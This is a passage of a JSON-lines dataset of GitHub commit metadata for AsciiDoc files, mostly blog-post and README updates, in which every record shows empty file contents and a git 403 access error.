12\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-05-07-New-12.adoc","new_file":"_posts\/2015-05-07-New-12.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"696e707409fb29127e20de56281095bdd0d1271f","subject":"Update 2015-11-12-Titre2.adoc","message":"Update 2015-11-12-Titre2.adoc","repos":"victorcouste\/blog,victorcouste\/blog,victorcouste\/blog","old_file":"_posts\/2015-11-12-Titre2.adoc","new_file":"_posts\/2015-11-12-Titre2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/victorcouste\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2510d5f9c2762b6980968eebdb6e5730c640bab","subject":"Added travis build badge","message":"Added travis build badge\n","repos":"b-cuts\/transfuse,dbachelder\/transfuse,johncarl81\/transfuse","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dbachelder\/transfuse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e9c7d21efc5b1c3b4bed7e9cefb385890be62bf","subject":"Update 
2016-09-27-Hedging-Factors.adoc","message":"Update 2016-09-27-Hedging-Factors.adoc","repos":"mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io","old_file":"_posts\/2016-09-27-Hedging-Factors.adoc","new_file":"_posts\/2016-09-27-Hedging-Factors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattpearson\/mattpearson.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8ea96b31ffb6a4540e849b6da48785629a1fdbe","subject":"Publish 2016-5-13-Engineer-Career-Path.adoc","message":"Publish 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d76113ad577d33a8310beceec5c4d7dcfaa40ea","subject":"Update 2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","message":"Update 2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","new_file":"_posts\/2015-08-19-Mein-Problem-mit-Sozial-Media-und-dem-Internet-im-allgemeinen-heutzutage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecb0e5a51ebcbbb39662103a791e044ef4d5efa5","subject":"Update 2017-03-11-Google-Cloud-Spanner-with-Spring-Boot-JPA-and-Hibernate.adoc","message":"Update 2017-03-11-Google-Cloud-Spanner-with-Spring-Boot-JPA-and-Hibernate.adoc","repos":"olavloite\/olavloite.github.io,olavloite\/olavloite.github.io,olavloite\/olavloite.github.io,olavloite\/olavloite.github.io","old_file":"_posts\/2017-03-11-Google-Cloud-Spanner-with-Spring-Boot-JPA-and-Hibernate.adoc","new_file":"_posts\/2017-03-11-Google-Cloud-Spanner-with-Spring-Boot-JPA-and-Hibernate.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olavloite\/olavloite.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54cb893de2ae57524f244ee5e8af8ba04b1a6a16","subject":"Update 2016-11-07-Style-sheets.adoc","message":"Update 2016-11-07-Style-sheets.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-11-07-Style-sheets.adoc","new_file":"_posts\/2016-11-07-Style-sheets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a9f31c51210885a71ad0e9586067f8186e74159","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 
2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0ffcefc4df7a598359d9d8649fab1204fbe8e68","subject":"Update 2015-10-20-homebrew_install_memo.adoc","message":"Update 2015-10-20-homebrew_install_memo.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2015-10-20-homebrew_install_memo.adoc","new_file":"_posts\/2015-10-20-homebrew_install_memo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e35b78cef2652a02d9ef0498f4246a1e0974432","subject":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot-L-I-N-E-Bot-Google-Cloud-Vision-A-P-I-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0da1d9af3b774b1c64c544a4a847ad101bd9d00","subject":"Update 2015-11-20-light-transport.adoc","message":"Update 2015-11-20-light-transport.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2015-11-20-light-transport.adoc","new_file":"_posts\/2015-11-20-light-transport.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"144e905b40e18f1cc33a83b00dbc4b7d8780eaed","subject":"Update 2017-08-23-Your-Blog-title.adoc","message":"Update 2017-08-23-Your-Blog-title.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2017-08-23-Your-Blog-title.adoc","new_file":"_posts\/2017-08-23-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a70655f0a1899ca6d98193760c3af9d615bd122","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 
2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7734fc99875a049571f985d17f3e3aa45834f53b","subject":"Update 2017-06-13-Falhas-em-Prolog.adoc","message":"Update 2017-06-13-Falhas-em-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-13-Falhas-em-Prolog.adoc","new_file":"_posts\/2017-06-13-Falhas-em-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52f5248b2679374a2d4750d0a1605e54cb6bbb50","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"kwpale\/kwpale.github.io,kwpale\/kwpale.github.io,kwpale\/kwpale.github.io,kwpale\/kwpale.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kwpale\/kwpale.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17c5f58859d5b05b0a7cbc14751463fe44c3910a","subject":"Update 2016-05-24-Episode-58-Virtual-Pinball-For-Real-or-V-P-Cabs-Interview.adoc","message":"Update 2016-05-24-Episode-58-Virtual-Pinball-For-Real-or-V-P-Cabs-Interview.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-05-24-Episode-58-Virtual-Pinball-For-Real-or-V-P-Cabs-Interview.adoc","new_file":"_posts\/2016-05-24-Episode-58-Virtual-Pinball-For-Real-or-V-P-Cabs-Interview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c5fd64c29dc7f268fdf2c3d30e582758fdf9936","subject":"Update 2015-03-07-Hello-World.adoc","message":"Update 2015-03-07-Hello-World.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2015-03-07-Hello-World.adoc","new_file":"_posts\/2015-03-07-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36819009bbd0daf261ba13406e88cdd30d531775","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 
2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49af64e18eb8957f9678d3cef51d29ec2fb2cde3","subject":"Update 2016-02-26-Gantt-Style.adoc","message":"Update 2016-02-26-Gantt-Style.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Gantt-Style.adoc","new_file":"_posts\/2016-02-26-Gantt-Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"922b6b85349e13bdd924b6b3fa7ec4870149c46f","subject":"Create SUMMARY..adoc","message":"Create SUMMARY..adoc","repos":"creocoder\/swagger2markup,izeye\/swagger2markup,Swagger2Markup\/swagger2markup,samxye\/swagger2markup,johanhammar\/swagger2markup,Relequestual\/swagger2markup","old_file":"SUMMARY..adoc","new_file":"SUMMARY..adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Relequestual\/swagger2markup.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"56c13ca7d0b33010225fe37914dbfd934735afdb","subject":"y2b create post iPhone 5s Fingerprint DEMO \\u0026 GUIDE (Apple Touch ID Test)","message":"y2b create post iPhone 5s Fingerprint DEMO \\u0026 GUIDE (Apple Touch ID Test)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-20-iPhone-5s-Fingerprint-DEMO-u0026-GUIDE-Apple-Touch-ID-Test.adoc","new_file":"_posts\/2013-09-20-iPhone-5s-Fingerprint-DEMO-u0026-GUIDE-Apple-Touch-ID-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"321b5a442c2edbe43a060117b77e5cb7c681b33d","subject":"add a change","message":"add a change\n","repos":"jbosschina\/openshift-cookbooks","old_file":"jboss\/datavirt\/cache-meta.adoc","new_file":"jboss\/datavirt\/cache-meta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/openshift-cookbooks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"676151bd15abdf74bdbeb241099d543fbc38f37c","subject":"Adding release notes for release of revapi_reporter_file_base revapi_reporter_json revapi_reporter_text","message":"Adding release notes for release of revapi_reporter_file_base revapi_reporter_json revapi_reporter_text\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20200727-reports-by-criticality.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20200727-reports-by-criticality.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d6d9e873c60d510fc036965dfe1e60d4520d0d1","subject":"Update 2016-06-01-Episode-59-Why-Gottliebs-Arent-Chris-Favourite-Manufacturer.adoc","message":"Update 2016-06-01-Episode-59-Why-Gottliebs-Arent-Chris-Favourite-Manufacturer.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-06-01-Episode-59-Why-Gottliebs-Arent-Chris-Favourite-Manufacturer.adoc","new_file":"_posts\/2016-06-01-Episode-59-Why-Gottliebs-Arent-Chris-Favourite-Manufacturer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"caa4ecacf88fcfc68b03359529620e0b11286203","subject":"Remove unnecessary line","message":"Remove unnecessary line\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"e7f02c09df3dc6e1877844fb29fa0f35da75de9a","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e80e955cf3c0eec4268d1657985667b7b14b03f7","subject":"Update 2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","message":"Update 2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0adee5e77e8ff400a5b1ba3e9b9d2181f93ee6fc","subject":"Update 2015-03-02-Install-Laravel-Administrator-on-Laravel-5.adoc","message":"Update 2015-03-02-Install-Laravel-Administrator-on-Laravel-5.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-03-02-Install-Laravel-Administrator-on-Laravel-5.adoc","new_file":"_posts\/2015-03-02-Install-Laravel-Administrator-on-Laravel-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"566130daf2a871c90d8981fbba4a469a059ccb50","subject":"v1.83 fix","message":"v1.83 fix\n","repos":"kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d53a5f76f890883315f7b8a38c87e96117d29feb","subject":"Setting version number in README","message":"Setting version number in README\n","repos":"skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skaterkamp\/szoo-faces.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fdeb78ba9ad30a47ce4d2535422d1deb6888c892","subject":"README.adoc updated with build info","message":"README.adoc updated with build info\n","repos":"BarclaysAfrica\/helloworld,BarclaysAfrica\/helloworld","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BarclaysAfrica\/helloworld.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a086856836c7dd1268f8a7dc4121493a1bf8828d","subject":"doc: Update gitter badge","message":"doc: Update gitter badge\n","repos":"gravitee-io\/gravitee-policy-groovy","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0b7f979a92062baa4c1da2273a4a164f10d4309a","subject":"examples readme","message":"examples readme\n","repos":"ivargrimstad\/snoop-samples,ivargrimstad\/snoop-samples","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/snoop-samples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"078889b525c76681c7d2e7d2b55f101a13d09232","subject":"updated README","message":"updated README\n","repos":"tuxdevelop\/spring-batch-lightmin-live,tuxdevelop\/spring-batch-lightmin-live","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tuxdevelop\/spring-batch-lightmin-live.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da393a7ef241dae0dff8722bc665579cc476bf4e","subject":"Link ex","message":"Link ex\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Class path\/README.adoc","new_file":"Class path\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"c5f5dc67a4e6aef3d35ad4f5b72ed5205de4783c","subject":"Add a simple README","message":"Add a simple README\n","repos":"Olical\/dotfiles","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Olical\/dotfiles.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"fe70055882ea7470262def4ffa5137af69604047","subject":"Add a README","message":"Add a README\n","repos":"spohnan\/ci-bot-01,spohnan\/ci-bot-01","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spohnan\/ci-bot-01.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7e4ef6465c780151a9bb62951f584f550f4263b","subject":"Updated readme.","message":"Updated readme.\n","repos":"jeffrimko\/Auxly","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jeffrimko\/Auxly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"632df20f50b4c13df63d536e2eec61f2e921fc53","subject":"Add simple build instructions to README","message":"Add simple build instructions to README\n","repos":"ALMighty\/almighty-core,ldimaggi\/almighty-core,ldimaggi\/almighty-core,ldimaggi\/almighty-core,ldimaggi\/almighty-core","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ldimaggi\/almighty-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce9ad6f5c1bb34c3e53dc2060f13ba276bb0bdbe","subject":"Add history file","message":"Add history file\n","repos":"gregspurrier\/klam","old_file":"HISTORY.asciidoc","new_file":"HISTORY.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gregspurrier\/klam.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b20a593912286c579fd8c6af06e66d62c091210","subject":"Docs test: defend against round numbers","message":"Docs test: defend against round numbers\n\nIf a shard has a nice, round number the test in the `_cat\/shards`\nreference file would fail. They should be ok with it. 
A failure:\nhttps:\/\/elasticsearch-ci.elastic.co\/job\/elastic+elasticsearch+5.3+multijob-unix-compatibility\/os=fedora\/93\/console\n","repos":"lks21c\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,nezirus\/elasticsearch,alexshadow007\/elasticsearch,vroyer\/elassandra,sneivandt\/elasticsearch,wenpos\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,sneivandt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,kalimatas\/elasticsearch,mohit\/elasticsearch,pozhidaevak\/elasticsearch,naveenhooda2000\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,nazarewk\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,jimczi\/elasticsearch,rajanm\/elasticsearch,rajanm\/elasticsearch,fred84\/elasticsearch,vroyer\/elasticassandra,mjason3\/elasticsearch,naveenhooda2000\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,winstonewert\/elasticsearch,wangtuo\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,wenpos\/elasticsearch,fred84\/elasticsearch,qwerty4030\/elasticsearch,masaruh\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,LeoYao\/elasticsearch,GlenRSmith\/elasticsearch,nezirus\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,naveenhooda2000\/elasticsearch,brandonkearby\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,LeoYao\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,fred84\/elasticsearch,alexshadow007\/elasticsearch,markwalkom\/elasticsearch,scorpionvicky\/elasticsearch,markwalkom\/elasticsearch,masaruh\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nezirus\/elasticsearch,gfyoung\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,Stacey-Gammon\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,nazarewk\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,naveenhooda2000\/elasticsearch,jimczi\/elasticsearch,mjason3\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,Stacey-Gammon\/elasticsearch,winstonewert\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,nazarewk\/elasticsearch,brandonkearby\/elasticsearch,nazarewk\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,nezirus\/ela
sticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,winstonewert\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,markwalkom\/elasticsearch,nknize\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra,kalimatas\/elasticsearch,masaruh\/elasticsearch,vroyer\/elassandra,s1monw\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elasticassandra,nknize\/elasticsearch,scorpionvicky\/elasticsearch,mohit\/elasticsearch,fred84\/elasticsearch,coding0011\/elasticsearch,shreejay\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,wangtuo\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,markwalkom\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,Stacey-Gammon\/elasticsearch,qwerty4030\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,winstonewert\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/e